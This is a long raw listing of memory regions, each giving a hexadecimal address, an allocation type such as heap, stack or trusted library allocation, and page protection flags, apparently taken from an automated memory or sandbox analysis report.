page read and write
6DB2000
direct allocation
page read and write
610000
heap
page read and write
9650000
trusted library allocation
page read and write
836C000
stack
page read and write
A5C0000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
A560000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
8830000
unkown
page read and write
5D92000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
1A915302000
heap
page read and write
75F0000
trusted library allocation
page read and write
1E0000
heap
page read and write
A650000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
8830000
unkown
page read and write
85B0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
86D467E000
stack
page read and write
24CB573A000
heap
page read and write
5FE7000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
C7E000
heap
page read and write
B83E000
trusted library allocation
page read and write
8830000
unkown
page read and write
2A409A9B000
heap
page read and write
97E0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
9655000
unkown
page read and write
9781000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
9785000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
618000
heap
page read and write
97F0000
trusted library allocation
page read and write
B450000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
B460000
trusted library allocation
page read and write
24CB4E6C000
heap
page read and write
CD3000
heap
page read and write
B410000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
490000
trusted library allocation
page read and write
4874000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
25969E4A000
heap
page read and write
95D0000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
C00000
heap
page read and write
9790000
unkown
page read and write
1A91A249000
heap
page read and write
B460000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
5934000
trusted library allocation
page read and write
98C0000
unkown
page read and write
1DE9A4EC000
heap
page read and write
98A0000
trusted library allocation
page read and write
3ACE8FF000
unkown
page read and write
1EB1FFA000
stack
page read and write
95F0000
trusted library allocation
page read and write
BAB000
heap
page read and write
A570000
trusted library allocation
page read and write
97F1000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
1EB23FD000
stack
page read and write
93D0000
unkown
page read and write
A590000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
BA7D000
trusted library allocation
page read and write
D24877F000
stack
page read and write
C09000
heap
page read and write
97E0000
trusted library allocation
page read and write
B855000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
1A91A200000
heap
page read and write
9920000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
484D000
trusted library allocation
page read and write
7B8F000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
D2D000
heap
page read and write
98D0000
trusted library allocation
page read and write
CD5000
heap
page read and write
1DE9A413000
heap
page read and write
50C000
stack
page read and write
1DE9ADA0000
heap
page read and write
8830000
trusted library allocation
page read and write
520000
remote allocation
page read and write
B410000
trusted library allocation
page read and write
1DE9AA70000
trusted library allocation
page read and write
171F8641000
heap
page read and write
533F000
stack
page read and write
D30000
heap
page read and write
95D0000
trusted library allocation
page read and write
1A91A170000
trusted library allocation
page read and write
986A000
trusted library allocation
page read and write
B415000
trusted library allocation
page read and write
8830000
unkown
page read and write
D22000
heap
page read and write
97D0000
trusted library allocation
page read and write
1A919F00000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
9610000
trusted library allocation
page execute and read and write
1A91A150000
trusted library allocation
page read and write
27C54C85000
heap
page read and write
C43000
heap
page read and write
813F000
stack
page read and write
A5F0000
trusted library allocation
page read and write
5DC000
stack
page read and write
A660000
trusted library allocation
page read and write
86D447E000
stack
page read and write
7540000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
C6C000
heap
page read and write
1DE9ADA0000
heap
page read and write
1DE9AD82000
heap
page read and write
1DE9A400000
heap
page read and write
85C0000
trusted library allocation
page read and write
93E0000
unkown
page read and write
8830000
trusted library allocation
page read and write
85BC000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
EE2349B000
stack
page read and write
1DE9AB30000
remote allocation
page read and write
13A0000
direct allocation
page read and write
98A0000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
8560000
trusted library allocation
page read and write
219E6464000
heap
page read and write
B460000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
14C09C13000
heap
page read and write
8830000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
7B7E000
stack
page read and write
B410000
trusted library allocation
page read and write
7603000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
A5BA000
trusted library allocation
page read and write
CC6000
heap
page read and write
14C0A402000
trusted library allocation
page read and write
2725B0E0000
unkown
page read and write
9650000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
BE3A000
trusted library allocation
page read and write
5276000
trusted library allocation
page execute and read and write
75F0000
trusted library allocation
page read and write
24CB4DB0000
heap
page read and write
97F0000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
979A000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
1DE9AD96000
heap
page read and write
8590000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
24CB4EE8000
heap
page read and write
98A0000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
24CB4F13000
heap
page read and write
97F0000
trusted library allocation
page read and write
6482000
trusted library allocation
page read and write
B4A0000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
52FE000
stack
page read and write
219E6477000
heap
page read and write
9785000
trusted library allocation
page read and write
B51000
heap
page read and write
1DE9AD7B000
heap
page read and write
A570000
trusted library allocation
page read and write
9615000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
1DE9A502000
heap
page read and write
8590000
trusted library allocation
page read and write
97D0000
unkown
page read and write
27C54D00000
heap
page read and write
9930000
trusted library allocation
page read and write
5D62000
trusted library allocation
page read and write
1A91A2F7000
heap
page read and write
8830000
unkown
page read and write
9AE0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
14C09BB0000
remote allocation
page read and write
1A91A030000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
B230000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
9870000
unkown
page read and write
B5C0000
trusted library allocation
page read and write
81E3000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
9D4D000
unkown
page read and write
5285000
trusted library allocation
page execute and read and write
9810000
trusted library allocation
page read and write
CC6000
heap
page read and write
B410000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
CA8000
heap
page read and write
1A914A00000
heap
page read and write
97F0000
trusted library allocation
page read and write
9760000
unkown
page read and write
B440000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
BE0000
direct allocation
page read and write
93F5000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
95D0000
unkown
page read and write
1DE9AD0C000
heap
page read and write
1DE9A513000
heap
page read and write
5D02000
trusted library allocation
page read and write
1DE9AD97000
heap
page read and write
75F3000
trusted library allocation
page read and write
C3CD2FC000
stack
page read and write
48E5000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
75EC000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
1A91A2A4000
heap
page read and write
B620000
trusted library allocation
page read and write
7AFD000
stack
page read and write
C5A000
heap
page read and write
5B75000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
D1A000
heap
page read and write
8830000
trusted library allocation
page read and write
C3CD4FF000
stack
page read and write
760000
heap
page read and write
27C54C55000
heap
page read and write
7730000
trusted library allocation
page read and write
85D0000
trusted library allocation
page read and write
BD2D000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
2177EE81000
heap
page read and write
9610000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
CB5000
heap
page read and write
269D8170000
heap
page read and write
1DE9AD2F000
heap
page read and write
9750000
trusted library allocation
page read and write
B75000
heap
page read and write
79C0000
heap
page read and write
8830000
trusted library allocation
page read and write
24CB4EBA000
heap
page read and write
97F0000
trusted library allocation
page read and write
BD57000
trusted library allocation
page read and write
1A914A3D000
heap
page read and write
A5F0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
C1D000
heap
page read and write
A650000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
8732000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
B470000
trusted library allocation
page read and write
9405000
trusted library allocation
page read and write
86E7000
trusted library allocation
page read and write
4DDE000
stack
page read and write
8835000
trusted library allocation
page read and write
4D3F000
stack
page read and write
219E645F000
heap
page read and write
9730000
unkown
page read and write
97D0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
1A91A21E000
heap
page read and write
4C7D000
stack
page read and write
9C05000
trusted library allocation
page read and write
E6D6BFF000
stack
page read and write
7920000
trusted library allocation
page read and write
A5B0000
trusted library allocation
page read and write
171F85A0000
trusted library allocation
page read and write
1DE9AD85000
heap
page read and write
97B0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
8590000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
97EB000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
14C09C02000
heap
page read and write
A680000
trusted library allocation
page read and write
C6D000
heap
page read and write
2880C8FE000
heap
page read and write
1DE9AD6C000
heap
page read and write
A5E0000
trusted library allocation
page read and write
24CB4D50000
heap
page read and write
269D8A02000
trusted library allocation
page read and write
85C0000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
CD5000
heap
page read and write
79BE000
stack
page read and write
7820000
trusted library allocation
page read and write
27C54B80000
heap
page read and write
30F0000
trusted library allocation
page read and write
BB13000
trusted library allocation
page read and write
1384000
direct allocation
page read and write
93D0000
unkown
page read and write
1A91A170000
remote allocation
page read and write
97F0000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
97F7000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
9AB0000
trusted library allocation
page read and write
8628000
unkown
page read and write
9910000
trusted library allocation
page read and write
571F000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
86D0000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
9933000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
4836000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
219E6447000
heap
page read and write
97F0000
trusted library allocation
page read and write
B460000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
2A409A73000
heap
page read and write
5E07000
trusted library allocation
page read and write
2177EE64000
heap
page read and write
B500000
trusted library allocation
page read and write
1DE9B202000
heap
page read and write
8830000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9810000
unkown
page read and write
BC0000
direct allocation
page read and write
76C0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
1DE9AD7A000
heap
page read and write
93E0000
trusted library allocation
page read and write
334EAFD000
stack
page read and write
4F10000
heap
page read and write
5AB0000
trusted library allocation
page read and write
53B0000
heap
page execute and read and write
9940000
trusted library allocation
page read and write
2725A5F5000
heap
page read and write
B42A000
trusted library allocation
page read and write
1DE9AD85000
heap
page read and write
64B7000
trusted library allocation
page read and write
7850000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
A630000
trusted library allocation
page execute and read and write
6E50000
heap
page read and write
8840000
trusted library allocation
page read and write
CBE000
heap
page read and write
C95000
heap
page read and write
2725A5F0000
heap
page read and write
9780000
trusted library allocation
page read and write
791E000
stack
page read and write
97F0000
trusted library allocation
page read and write
1360000
direct allocation
page read and write
10FE000
stack
page read and write
7670000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
A050000
heap
page read and write
1A914B02000
heap
page read and write
24009A02000
heap
page read and write
820C000
stack
page read and write
98A9000
trusted library allocation
page read and write
1DE9AD85000
heap
page read and write
7640000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
24009A68000
heap
page read and write
1DE9AD2F000
heap
page read and write
B430000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
B84000
heap
page read and write
5080000
heap
page read and write
93E0000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
1306000
direct allocation
page read and write
A5F0000
trusted library allocation
page read and write
8835000
unkown
page read and write
97F0000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
994F000
trusted library allocation
page read and write
86A0000
trusted library allocation
page read and write
171F8602000
heap
page read and write
4D9D000
stack
page read and write
3ACE2FD000
stack
page read and write
97E0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
A680000
trusted library allocation
page execute and read and write
97E0000
trusted library allocation
page read and write
2880C8F0000
heap
page read and write
C90000
heap
page read and write
A620000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
B53000
heap
page read and write
24CB4D40000
heap
page read and write
D7A7E77000
stack
page read and write
7FE0000
direct allocation
page read and write
93D0000
unkown
page read and write
1A914950000
heap
page read and write
86B4000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
8600000
trusted library allocation
page read and write
219E6463000
heap
page read and write
334E38C000
stack
page read and write
A5F0000
trusted library allocation
page read and write
C75000
heap
page read and write
9930000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
269D8213000
heap
page read and write
97F0000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
A651000
trusted library allocation
page read and write
E6D65EB000
stack
page read and write
B440000
trusted library allocation
page read and write
7B96000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
1DE9A4E9000
heap
page read and write
97F0000
trusted library allocation
page read and write
7450000
trusted library allocation
page read and write
C00000
direct allocation
page read and write
85D0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
1EB25FF000
stack
page read and write
EE238FB000
stack
page read and write
A650000
trusted library allocation
page read and write
7550000
trusted library allocation
page read and write
9AA0000
trusted library allocation
page read and write
32C0000
heap
page read and write
96F0000
trusted library allocation
page read and write
171F8659000
heap
page read and write
93D5000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
269D8202000
heap
page read and write
7600000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
1A914A78000
heap
page read and write
CCA000
heap
page read and write
2880CA60000
heap
page read and write
9780000
trusted library allocation
page read and write
2880C8F0000
heap
page read and write
D27000
heap
page read and write
9BB4000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
D0C000
heap
page read and write
C3CD7FB000
stack
page read and write
A620000
trusted library allocation
page read and write
E6D6CFF000
stack
page read and write
CA0000
heap
page read and write
14C09BB0000
remote allocation
page read and write
4841000
trusted library allocation
page read and write
8590000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
EFAFCBA000
stack
page read and write
97D0000
trusted library allocation
page read and write
219E6435000
heap
page read and write
97F0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
8620000
unkown
page read and write
AD0000
heap
page read and write
9B40000
trusted library allocation
page read and write
93D0000
unkown
page read and write
A650000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
CC6000
heap
page read and write
30F0000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
95E4000
trusted library allocation
page read and write
95E5000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
1A915B00000
trusted library section
page readonly
9720000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
BE1000
direct allocation
page read and write
A620000
trusted library allocation
page read and write
4DF8000
heap
page read and write
9870000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
9F4F000
stack
page read and write
A560000
trusted library allocation
page read and write
C3CD77E000
stack
page read and write
95F0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
8620000
unkown
page read and write
95E0000
trusted library allocation
page read and write
5DE000
stack
page read and write
1DE9B202000
heap
page read and write
9930000
trusted library allocation
page read and write
1DE9ADD7000
heap
page read and write
219E643F000
heap
page read and write
9750000
trusted library allocation
page read and write
93D0000
unkown
page read and write
24009960000
heap
page read and write
1DE9AD7A000
heap
page read and write
9750000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
95E5000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
219E6461000
heap
page read and write
82EF000
stack
page read and write
171F865C000
heap
page read and write
7920000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
4E0000
remote allocation
page read and write
98F0000
trusted library allocation
page read and write
113D000
stack
page read and write
9750000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
83AE000
stack
page read and write
2596A402000
trusted library allocation
page read and write
9416000
trusted library allocation
page read and write
1A91A23C000
heap
page read and write
1DE9AD7B000
heap
page read and write
9780000
trusted library allocation
page read and write
A590000
trusted library allocation
page read and write
1DE9AD7A000
heap
page read and write
1277000
heap
page read and write
25969F13000
heap
page read and write
C1D000
heap
page read and write
82AE000
stack
page read and write
A5C0000
trusted library allocation
page read and write
95EE000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9655000
unkown
page read and write
9860000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
538D000
stack
page read and write
8830000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
C6A000
heap
page read and write
9740000
trusted library allocation
page read and write
A5E9000
trusted library allocation
page read and write
1EB24FE000
stack
page read and write
B410000
trusted library allocation
page read and write
27C54C63000
heap
page read and write
96E0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
B91B000
trusted library allocation
page read and write
8830000
unkown
page read and write
9410000
trusted library allocation
page read and write
B3F0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
2880C905000
heap
page read and write
9B20000
trusted library allocation
page read and write
95D8000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
1A91A2FB000
heap
page read and write
93D5000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
A590000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
1A91A170000
remote allocation
page read and write
A570000
trusted library allocation
page read and write
8622000
trusted library allocation
page read and write
4CCD000
stack
page read and write
7FE20000
trusted library allocation
page execute and read and write
9740000
trusted library allocation
page read and write
9AC0000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
B433000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
1DE9A429000
heap
page read and write
2A409A29000
heap
page read and write
85E0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
E21727C000
stack
page read and write
52FC000
stack
page read and write
269D8257000
heap
page read and write
97B0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
EFB01FC000
stack
page read and write
9D0000
heap
page read and write
269D8225000
heap
page read and write
A620000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
53CE000
stack
page read and write
650000
heap
page read and write
30F0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
5120000
heap
page read and write
4872000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
1DE9ADAB000
heap
page read and write
7600000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
25969E4F000
heap
page read and write
9600000
trusted library allocation
page read and write
7801000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
B410000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
CDA000
heap
page read and write
97F0000
trusted library allocation
page read and write
2880C8D6000
heap
page read and write
9750000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
2177ED20000
heap
page read and write
57BE000
stack
page read and write
93F0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
6DB8000
direct allocation
page read and write
950000
trusted library allocation
page read and write
487E000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
B866000
trusted library allocation
page read and write
A5D3000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
9804000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
171F8679000
heap
page read and write
A60000
heap
page read and write
B3E000
stack
page read and write
93D0000
trusted library allocation
page read and write
BE32000
trusted library allocation
page read and write
B5A0000
trusted library allocation
page read and write
5440000
heap
page read and write
219E645A000
heap
page read and write
219E6458000
heap
page read and write
A640000
trusted library allocation
page read and write
1DE9ADA0000
heap
page read and write
97E0000
trusted library allocation
page read and write
27C54D13000
heap
page read and write
1A914A6E000
heap
page read and write
98C0000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
BA6000
direct allocation
page read and write
D3C000
heap
page read and write
85D0000
trusted library allocation
page read and write
25969E4D000
heap
page read and write
9405000
trusted library allocation
page read and write
9B2E000
stack
page read and write
9620000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
2725A730000
trusted library allocation
page read and write
58E000
stack
page read and write
A608000
trusted library allocation
page read and write
95D9000
trusted library allocation
page read and write
1A915B10000
trusted library section
page readonly
8830000
unkown
page read and write
98E0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
B480000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
27C54C69000
heap
page read and write
BB1B000
trusted library allocation
page read and write
1A9149F0000
trusted library section
page read and write
219E643D000
heap
page read and write
5253000
trusted library allocation
page execute and read and write
9750000
trusted library allocation
page read and write
5A37000
trusted library allocation
page read and write
7640000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
520000
remote allocation
page read and write
9930000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
B60000
direct allocation
page read and write
9860000
trusted library allocation
page read and write
A5B0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
2A409B02000
heap
page read and write
95F0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
1DE9AD96000
heap
page read and write
B420000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
5D38000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
93F5000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
93E9000
trusted library allocation
page read and write
98E7000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
1DE9AD1C000
heap
page read and write
2A40A080000
trusted library allocation
page read and write
D3B000
heap
page read and write
97F0000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
4CFE000
stack
page read and write
BB7F000
trusted library allocation
page read and write
99F3000
trusted library allocation
page read and write
93D0000
unkown
page read and write
97E0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
1070000
heap
page read and write
4845000
trusted library allocation
page read and write
B880000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
3ACE57A000
stack
page read and write
97F0000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
1311000
direct allocation
page read and write
9810000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9620000
unkown
page read and write
9A80000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
2177EE13000
heap
page read and write
24CB4E3E000
heap
page read and write
A580000
trusted library allocation
page execute and read and write
B410000
trusted library allocation
page read and write
4FD000
stack
page read and write
A660000
trusted library allocation
page read and write
9880000
trusted library allocation
page execute and read and write
B400000
trusted library allocation
page read and write
EE23BFE000
stack
page read and write
8835000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
B23B000
trusted library allocation
page read and write
1A91A2E3000
heap
page read and write
B410000
trusted library allocation
page read and write
1A91A2ED000
heap
page read and write
B440000
trusted library allocation
page read and write
309C000
stack
page read and write
97C0000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
14C09B50000
heap
page read and write
76D0000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
25969C10000
heap
page read and write
219E6440000
heap
page read and write
B1E000
stack
page read and write
98D0000
trusted library allocation
page read and write
BA2000
direct allocation
page read and write
1A919E70000
trusted library allocation
page read and write
BB42000
trusted library allocation
page read and write
1A914A88000
heap
page read and write
5254000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
B640000
trusted library allocation
page read and write
24CB5602000
heap
page read and write
B410000
trusted library allocation
page read and write
1DE9ADA0000
heap
page read and write
9400000
trusted library allocation
page read and write
CE1000
heap
page read and write
93F0000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
C7E000
stack
page read and write
75F0000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9753000
trusted library allocation
page read and write
97C0000
trusted library allocation
page execute and read and write
3160000
trusted library allocation
page read and write
4A0000
trusted library allocation
page read and write
171F863E000
heap
page read and write
5FD6000
trusted library allocation
page read and write
A5A0000
trusted library allocation
page read and write
97D0000
unkown
page read and write
8830000
unkown
page read and write
1DE9AD96000
heap
page read and write
9410000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
B833000
trusted library allocation
page read and write
E2175FF000
stack
page read and write
A620000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
1DE9AD7C000
heap
page read and write
C82000
heap
page read and write
9FA000
stack
page read and write
D33000
heap
page read and write
B75000
heap
page read and write
219E643A000
heap
page read and write
9810000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
C08000
heap
page read and write
8830000
trusted library allocation
page read and write
CCA000
heap
page read and write
93D5000
unkown
page read and write
95D0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
62E5BFF000
stack
page read and write
1A91A22C000
heap
page read and write
9400000
unkown
page read and write
9815000
unkown
page read and write
30F0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
219E6441000
heap
page read and write
98C0000
trusted library allocation
page read and write
98AF000
trusted library allocation
page read and write
171F8600000
heap
page read and write
9400000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
7B9C000
trusted library allocation
page read and write
219E6469000
heap
page read and write
1A915AD0000
trusted library section
page readonly
97F0000
trusted library allocation
page read and write
3170000
trusted library allocation
page read and write
1DE9AD96000
heap
page read and write
9930000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
A5A0000
trusted library allocation
page execute and read and write
9B30000
trusted library allocation
page read and write
9430000
trusted library allocation
page read and write
1A91A2F6000
heap
page read and write
A600000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
C2F000
heap
page read and write
95F0000
trusted library allocation
page read and write
530000
remote allocation
page read and write
98E0000
trusted library allocation
page read and write
14C09D02000
heap
page read and write
9760000
trusted library allocation
